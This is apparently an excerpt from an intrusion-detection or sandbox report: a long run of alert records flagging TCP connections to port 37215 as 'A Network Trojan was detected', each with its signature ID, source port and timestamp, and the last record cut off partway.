              SID:2829579
              Source Port:53442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822565
              SID:2835222
              Source Port:32988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756056
              SID:2829579
              Source Port:38054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264161
              SID:2829579
              Source Port:58100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.299755
              SID:2829579
              Source Port:55216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502147
              SID:2835222
              Source Port:40004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507315
              SID:2835222
              Source Port:54970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.803857
              SID:2829579
              Source Port:59410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833008
              SID:2835222
              Source Port:35758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.149376
              SID:2835222
              Source Port:53780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672742
              SID:2835222
              Source Port:37162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710949
              SID:2829579
              Source Port:37876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231265
              SID:2835222
              Source Port:34288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914628
              SID:2835222
              Source Port:38220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087602
              SID:2835222
              Source Port:40600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.306958
              SID:2829579
              Source Port:38780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079160
              SID:2829579
              Source Port:56900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.095725
              SID:2835222
              Source Port:35932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406441
              SID:2829579
              Source Port:44756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151338
              SID:2829579
              Source Port:36900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152831
              SID:2835222
              Source Port:34354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992694
              SID:2835222
              Source Port:57732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424627
              SID:2829579
              Source Port:37042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.501909
              SID:2829579
              Source Port:52910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169662
              SID:2835222
              Source Port:43240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610636
              SID:2829579
              Source Port:52190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725511
              SID:2829579
              Source Port:46430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.135658
              SID:2835222
              Source Port:37498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245347
              SID:2829579
              Source Port:57956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110728
              SID:2829579
              Source Port:38364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159744
              SID:2835222
              Source Port:43100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137066
              SID:2835222
              Source Port:48668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.781483
              SID:2829579
              Source Port:50312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787609
              SID:2835222
              Source Port:34566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195053
              SID:2835222
              Source Port:38876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610825
              SID:2835222
              Source Port:53724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275771
              SID:2835222
              Source Port:53164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028431
              SID:2829579
              Source Port:51150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154012
              SID:2835222
              Source Port:36928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099600
              SID:2835222
              Source Port:43478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.371910
              SID:2835222
              Source Port:39036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301523
              SID:2835222
              Source Port:56560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027376
              SID:2835222
              Source Port:58532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048251
              SID:2835222
              Source Port:39280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060748
              SID:2829579
              Source Port:39078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.297833
              SID:2829579
              Source Port:45108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943579
              SID:2829579
              Source Port:43222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402540
              SID:2835222
              Source Port:44164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.629918
              SID:2829579
              Source Port:51368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451987
              SID:2829579
              Source Port:55162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988200
              SID:2829579
              Source Port:50486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028908
              SID:2835222
              Source Port:33196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374502
              SID:2835222
              Source Port:49592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.129876
              SID:2835222
              Source Port:55078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420508
              SID:2835222
              Source Port:52016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.346031
              SID:2829579
              Source Port:40254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695723
              SID:2829579
              Source Port:39954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941525
              SID:2835222
              Source Port:52028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913441
              SID:2829579
              Source Port:60824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111031
              SID:2829579
              Source Port:60302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477527
              SID:2835222
              Source Port:54130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420708
              SID:2829579
              Source Port:34894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170484
              SID:2835222
              Source Port:36306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503639
              SID:2829579
              Source Port:54814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131243
              SID:2835222
              Source Port:56506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.129847
              SID:2829579
              Source Port:33318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608710
              SID:2835222
              Source Port:46380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092329
              SID:2829579
              Source Port:49978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.130359
              SID:2835222
              Source Port:56710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749050
              SID:2829579
              Source Port:49882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451047
              SID:2835222
              Source Port:59834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.240861
              SID:2835222
              Source Port:45538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403881
              SID:2835222
              Source Port:33500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.994206
              SID:2829579
              Source Port:43672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275169
              SID:2829579
              Source Port:33146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630434
              SID:2829579
              Source Port:56622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458671
              SID:2835222
              Source Port:42498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.299047
              SID:2835222
              Source Port:53534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041769
              SID:2829579
              Source Port:42622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.173690
              SID:2835222
              Source Port:59338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.781726
              SID:2829579
              Source Port:45786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214659
              SID:2829579
              Source Port:38852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451688
              SID:2835222
              Source Port:59648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990801
              SID:2835222
              Source Port:37782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028804
              SID:2835222
              Source Port:37440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.884297
              SID:2829579
              Source Port:59374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310393
              SID:2835222
              Source Port:52208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.376980
              SID:2835222
              Source Port:54976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.101929
              SID:2829579
              Source Port:36214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.010636
              SID:2829579
              Source Port:38926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914560
              SID:2829579
              Source Port:50368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.971231
              SID:2835222
              Source Port:56434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.136091
              SID:2835222
              Source Port:42576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787204
              SID:2829579
              Source Port:33790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369294
              SID:2829579
              Source Port:42338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345883
              SID:2835222
              Source Port:59178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507348
              SID:2829579
              Source Port:47214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.603671
              SID:2829579
              Source Port:40038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995941
              SID:2829579
              Source Port:58034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.305749
              SID:2835222
              Source Port:44594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357699
              SID:2829579
              Source Port:57820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042221
              SID:2835222
              Source Port:59022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724904
              SID:2829579
              Source Port:34832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013691
              SID:2829579
              Source Port:45996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039777
              SID:2829579
              Source Port:37794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111721
              SID:2829579
              Source Port:32922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016053
              SID:2829579
              Source Port:42946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227634
              SID:2835222
              Source Port:50566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820289
              SID:2835222
              Source Port:38450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566525
              SID:2829579
              Source Port:37734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.629832
              SID:2829579
              Source Port:35912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.831043
              SID:2829579
              Source Port:57488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253384
              SID:2835222
              Source Port:45002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565576
              SID:2829579
              Source Port:35412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834905
              SID:2835222
              Source Port:51246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711163
              SID:2835222
              Source Port:39298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614305
              SID:2835222
              Source Port:48548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.274149
              SID:2829579
              Source Port:47280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109077
              SID:2835222
              Source Port:52330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440121
              SID:2835222
              Source Port:45536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.095814
              SID:2835222
              Source Port:54784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257154
              SID:2829579
              Source Port:43064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376784
              SID:2829579
              Source Port:36070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230449
              SID:2835222
              Source Port:60544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076929
              SID:2829579
              Source Port:34634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211026
              SID:2829579
              Source Port:52336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569653
              SID:2829579
              Source Port:51640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132009
              SID:2835222
              Source Port:36840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041937
              SID:2829579
              Source Port:49198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696425
              SID:2829579
              Source Port:55876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043975
              SID:2829579
              Source Port:50466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407077
              SID:2829579
              Source Port:35064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213451
              SID:2829579
              Source Port:33026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752309
              SID:2829579
              Source Port:53444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322335
              SID:2835222
              Source Port:40384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422726
              SID:2829579
              Source Port:38662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165315
              SID:2829579
              Source Port:44830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375624
              SID:2829579
              Source Port:51864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275775
              SID:2835222
              Source Port:40436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168653
              SID:2829579
              Source Port:57182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936277
              SID:2835222
              Source Port:59494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783868
              SID:2829579
              Source Port:60936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439045
              SID:2829579
              Source Port:48200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403403
              SID:2835222
              Source Port:60212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308357
              SID:2829579
              Source Port:39670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551910
              SID:2835222
              Source Port:38870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833061
              SID:2835222
              Source Port:33462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176590
              SID:2835222
              Source Port:44286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565412
              SID:2829579
              Source Port:52848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407931
              SID:2835222
              Source Port:47786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508383
              SID:2835222
              Source Port:49520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026547
              SID:2835222
              Source Port:56440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405600
              SID:2835222
              Source Port:43832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726285
              SID:2829579
              Source Port:48234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.417648
              SID:2835222
              Source Port:43742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824365
              SID:2835222
              Source Port:37058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272082
              SID:2835222
              Source Port:50220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936686
              SID:2835222
              Source Port:46814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.911151
              SID:2835222
              Source Port:40716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.973162
              SID:2835222
              Source Port:42474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655320
              SID:2835222
              Source Port:46822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.633141
              SID:2829579
              Source Port:45766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130581
              SID:2835222
              Source Port:34830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.954911
              SID:2829579
              Source Port:34236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782810
              SID:2835222
              Source Port:35956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936360
              SID:2829579
              Source Port:38904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152411
              SID:2835222
              Source Port:35482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453901
              SID:2835222
              Source Port:49460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564084
              SID:2829579
              Source Port:49206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028182
              SID:2835222
              Source Port:33716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075503
              SID:2835222
              Source Port:49468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454593
              SID:2829579
              Source Port:34398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090963
              SID:2835222
              Source Port:52342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.135920
              SID:2829579
              Source Port:50982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152534
              SID:2829579
              Source Port:36458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633377
              SID:2829579
              Source Port:43454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154751
              SID:2835222
              Source Port:33628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194795
              SID:2835222
              Source Port:55088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.174664
              SID:2829579
              Source Port:44212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914115
              SID:2835222
              Source Port:43224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757993
              SID:2829579
              Source Port:58260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403450
              SID:2829579
              Source Port:50990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159477
              SID:2829579
              Source Port:33806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214549
              SID:2829579
              Source Port:56542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694823
              SID:2835222
              Source Port:56910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012355
              SID:2835222
              Source Port:60226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569538
              SID:2829579
              Source Port:42124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275972
              SID:2835222
              Source Port:59614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.095148
              SID:2829579
              Source Port:54432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192095
              SID:2829579
              Source Port:37412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212660
              SID:2829579
              Source Port:39132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658189
              SID:2829579
              Source Port:36282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725389
              SID:2829579
              Source Port:39796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166805
              SID:2835222
              Source Port:44350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.112372
              SID:2835222
              Source Port:46652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229051
              SID:2835222
              Source Port:48340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.606039
              SID:2829579
              Source Port:45890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109437
              SID:2835222
              Source Port:48766
              Destination Port:37215
